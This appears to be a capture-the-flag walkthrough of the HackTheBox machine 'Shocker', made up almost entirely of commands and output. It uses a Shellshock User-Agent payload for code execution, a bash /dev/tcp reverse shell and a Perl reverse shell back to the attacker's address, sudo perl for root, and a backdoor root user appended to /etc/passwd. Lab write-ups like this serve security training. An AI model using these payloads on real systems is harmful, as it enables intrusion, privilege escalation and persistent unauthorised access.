HackTheBox Shocker

$ nmap -sC -sV -A 10.10.10.56
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)

# Directory enumeration for CGI scripts
$ dirsearch -u 10.10.10.56 -w /usr/share/dirb/wordlists/common.txt
[20:21:30] 403 -  294B  - /cgi-bin/

# CGI script enumeration with extensions
$ dirsearch -u http://10.10.10.56/cgi-bin -w /usr/share/dirb/wordlists/common.txt -f -e sh,cgi,bash
[20:29:19] 200 -  119B  - /cgi-bin/user.sh

# Examine CGI script functionality
$ curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

 07:31:03 up 30 min,  0 users,  load average: 0.00, 0.02, 0.00

# Test for Shellshock via User-Agent header
$ curl -H "User-Agent: () { :; }; echo; /bin/id" http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

Just an uptime test script
 07:31:03 up 30 min,  0 users,  load average: 0.00, 0.02, 0.00

# Setup netcat listener
$ nc -nlvp 1337
listening on [any] 1337 ...

# Execute reverse shell via Shellshock
$ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'exec bash -i &>/dev/tcp/10.10.14.25/1337 <&1'" http://10.10.10.56/cgi-bin/user.sh
# Reverse shell received
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 44040
bash: no job control in this shell

shelly@Shocker:/usr/lib/cgi-bin$ python3 -c 'import pty;pty.spawn("/bin/bash")'
shelly@Shocker:/usr/lib/cgi-bin$ whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt
2ec24e11320026d1e70ff3e16695b233

shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

# Setup netcat listener for root shell
$ nc -nlvp 6969
listening on [any] 6969 ...

# Execute Perl reverse shell as root
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.25";$p=6969;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Root shell received
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 41834
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
52c2715605d70c7619030560dc1ca467

# Execute system commands via Perl
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'system("/bin/bash")'
root@Shocker:/home/shelly# whoami
root

# Add new root user via Perl
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'open(FH, ">>/etc/passwd"); print FH "hacker:$1$salt$qJH7.N4xYta3aEG/dfqo/:0:0:Hacker:/root:/bin/bash\n"; close(FH);'

# Switch to new root user  
shelly@Shocker:/home/shelly$ su hacker
Password: 123456
root@Shocker:/home/shelly# whoami
root